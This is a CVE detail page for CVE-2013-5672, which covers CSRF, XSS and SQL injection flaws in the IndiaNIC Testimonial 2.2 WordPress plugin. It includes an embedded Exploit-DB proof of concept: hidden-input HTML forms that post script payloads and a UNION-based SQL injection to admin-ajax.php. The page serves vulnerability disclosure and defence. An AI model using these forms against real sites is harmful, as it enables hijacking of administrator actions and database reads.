CVE-2013-5672 : Detail

CVE-2013-5672

Cross-Site Request Forgery - CSRF
A01-Broken Access Control
1.35%V3
Network
2013-09-10
17h00 +00:00
2017-08-28
10h57 +00:00
CVE.org
NVD
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Multiple cross-site request forgery (CSRF) vulnerabilities in the IndiaNIC Testimonial plugin 2.2 for WordPress allow remote attackers to hijack the authentication of administrators for requests that (1) add a testimonial via an iNIC_testimonial_save action; (2) add a listing template via an iNIC_testimonial_save_listing_template action; (3) add a widget template via an iNIC_testimonial_save_widget action; insert cross-site scripting (XSS) sequences via the (4) project_name, (5) project_url, (6) client_name, (7) client_city, (8) client_state, (9) description, (10) tags, (11) video_url, or (12) is_featured, (13) title, (14) widget_title, (15) no_of_testimonials, (16) filter_by_country, (17) filter_by_tags, or (18) widget_template parameter to wp-admin/admin-ajax.php.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-352 Cross-Site Request Forgery (CSRF)
The web application does not, or can not, sufficiently verify whether a well-formed, valid, consistent request was intentionally provided by the user who submitted the request.

Metrics

Metrics Score Severity CVSS Vector Source
V2 6.8 AV:N/AC:M/Au:N/C:P/I:P/A:P [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 28054

Publication date : 2013-09-02 22h00 +00:00
Author : RogueCoder
EDB Verified : No

Details ======================== Application: Testimonial Version: 2.2 Type: Wordpress plugin Vendor: IndiaNIC Vulnerability: - XSS (CWE-79) - CSRF (CWE-352) - SQL Injection (CWE-89) Description ======================== Testimonial Plugin allows you to add, delete, edit and place what others said about your web site. Loaded with unequaled features, this plugin gets you complete control over testimonials. This is the very first Plug-in which is designed especially keeping our motto in mind that ‘every client is important’. It is as an imperative tool for supervising your official website in accordance to your clients. Vulnerability ======================== This plugin is vulnerable to cross-site request forgery, cross-site scripting and sql injection. 1. Add testimonial form is vulnerable to CSRF and XSS 2. Add listings template is vulnerable to CSRF, XSS and SQLi 3. Add widget template is vulnerable to CSRF and XSS Proof of Concept ======================== 1. Add testimonial <form name="testimonial_add" method="post" action="http://wordpress/wp-admin/admin-ajax.php"> <input type="hidden" name="action" value="iNIC_testimonial_save"> <input type="hidden" name="project_name" value="<script>alert(String.fromCharCode(67,83,82,70,32,49))</script>"> <input type="hidden" name="project_url" value="<script>alert(String.fromCharCode(67,83,82,70,32,50))</script>"> <input type="hidden" name="client_name" value="<script>alert(String.fromCharCode(67,83,82,70,32,51))</script>"> <input type="hidden" name="client_city" value="<script>alert(String.fromCharCode(67,83,82,70,32,52))</script>"> <input type="hidden" name="client_state" value="<script>alert(String.fromCharCode(67,83,82,70,32,53))</script>"> <input type="hidden" name="client_country" value="Belgium"> <input type="hidden" name="description" value="<script>alert(String.fromCharCode(67,83,82,70,32,54))</script>"> <input type="hidden" name="tags" value="<script>alert(String.fromCharCode(67,83,82,70,32,55))</script>"> <input type="hidden" name="video_url" value="<script>alert(String.fromCharCode(67,83,82,70,32,56))</script>"> <input type="hidden" name="is_featured" value="<script>alert(String.fromCharCode(67,83,82,70,32,57))</script>"> <input type="submit" value="Save Testimonial"> </form> 2. Add listings template <form name="testimonial_add" method="post" action="http://wordpress/wp-admin/admin-ajax.php"> <input type="hidden" name="action" value="iNIC_testimonial_save_listing_template"> <input type="hidden" name="id" value="9"> <input type="hidden" name="title" value="<script>alert(String.fromCharCode(67,83,82,70,32,49))</script>"> <input type="hidden" name="no_of_testimonial" value="5"> <input type="hidden" name="list_per_page" value="5"> <input type="hidden" name="ord_by" value="id"> <input type="hidden" name="ord_type" value="ASC"> <input type="hidden" name="custom_query" value="1=1) union select 1,2,3,@@version,5,6,7,8,9,10,11,12,13,14#"> <input type="hidden" name="show_featured_at" value="top"> <input type="hidden" name="no_of_featured" value="2"> <input type="hidden" name="featured_template" value="{#ID} {#ProjectUrl} {#ProjectName} {#ProjectUrl} {#ClientName} {#City} {#State} {#Country} {#Description} {#Tags} {#VideoUrl} {#ThumbImgUrl} {#LargeImgUrl} {#Counter}"> <input type="hidden" name="listing_template_odd" value="{#ID} {#ProjectUrl} {#ProjectName} {#ProjectUrl} {#ClientName} {#City} {#State} {#Country} {#Description} {#Tags} {#VideoUrl} {#ThumbImgUrl} {#LargeImgUrl} {#Counter}"> <input type="hidden" name="listing_template_even" value="{#ID} {#ProjectUrl} {#ProjectName} {#ProjectUrl} {#ClientName} {#City} {#State} {#Country} {#Description} {#Tags} {#VideoUrl} {#ThumbImgUrl} {#LargeImgUrl} {#Counter}"> <input type="submit" value="Add Template"> </form> 3. Add widget template <form name="testimonial_add" method="post" action="http://wordpress/wp-admin/admin-ajax.php"> <input type="hidden" name="action" value="iNIC_testimonial_save_widget"> <input type="hidden" name="widget_title" value="<script>alert(String.fromCharCode(67,83,82,70,32,49))</script>"> <input type="hidden" name="no_of_testimonials" value="<script>alert(String.fromCharCode(67,83,82,70,32,50))</script>"> <input type="hidden" name="filter_by_country" value="<script>alert(String.fromCharCode(67,83,82,70,32,51))</script>"> <input type="hidden" name="filter_by_tags" value="<script>alert(String.fromCharCode(67,83,82,70,32,52))</script>"> <input type="hidden" name="widget_template" value="<script>alert(String.fromCharCode(67,83,82,70,32,53))</script>"> <input type="submit" value="Add Template"> </form> Solution ======================== No patch has been provided by vendor. Solution would be to stop using this plugin in a public environment Timeline ======================== 2013-08-07 - Email sent to IndiaNIC 2013-08-08 - Notification left on the plugin's Support board on wordpress.org 2013-09-01 - No response or patch released. Publicly disclosed

Products Mentioned

Configuraton 0

Indianic>>Testimonial_plugin >> Version 2.2

Wordpress>>Wordpress >> Version -

References

http://www.securityfocus.com/bid/62109
Tags : vdb-entry, x_refsource_BID
http://seclists.org/fulldisclosure/2013/Sep/5
Tags : mailing-list, x_refsource_FULLDISC
http://seclists.org/oss-sec/2013/q3/531
Tags : mailing-list, x_refsource_MLIST
http://secunia.com/advisories/54640
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.exploit-db.com/exploits/28054
Tags : exploit, x_refsource_EXPLOIT-DB
http://osvdb.org/96792
Tags : vdb-entry, x_refsource_OSVDB